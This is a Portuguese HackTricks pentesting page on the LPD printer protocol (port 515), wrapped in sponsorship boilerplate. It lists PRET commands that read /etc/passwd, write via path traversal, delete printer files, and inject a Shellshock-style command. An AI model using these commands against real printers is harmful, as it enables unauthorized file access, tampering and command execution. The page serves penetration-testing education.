Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! Outras formas de apoiar o HackTricks: * Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos * **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
O protocolo Line Printer Daemon (LPD) foi originalmente introduzido no Berkeley Unix nos anos 80 (posteriormente especificado pelo RFC1179).\ O daemon é executado na porta 515/tcp e pode ser acessado usando o comando `lpr`. Para imprimir, o cliente envia um **arquivo de controle** definindo o trabalho/usuário e um **arquivo de dados** contendo os dados reais a serem impressos. O **tipo de entrada** do arquivo de dados pode ser definido no arquivo de controle escolhendo entre **vários formatos de arquivo**. No entanto, cabe à implementação do LPD como realmente lidar com os dados de impressão. Uma implementação popular do LPD para sistemas operacionais semelhantes ao Unix é o LPRng. O LPD pode ser usado como um meio para implantar **trabalhos de impressão maliciosos em PostScript** ou **PJL**. As ferramentas `lpdprint` e `lpdtest` estão incluídas no [**PRET**](https://github.com/RUB-NDS/PRET)**.** Elas são uma maneira minimalista de imprimir dados diretamente em uma impressora compatível com LPD ou baixar/upload/excluir arquivos e mais: ``` lpdprint.py hostname filename lpdtest.py hostname get /etc/passwd lpdtest.py hostname put ../../etc/passwd lpdtest.py hostname rm /some/file/on/printer lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4' lpdtest.py hostname mail lpdtest@mailhost.local ``` Se você quer aprender mais sobre [**hackear impressoras leia esta página**](pentesting-printers/). # Shodan * `porta 515`
Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)! Outras formas de apoiar o HackTricks: * Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! * Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com) * Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos * **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).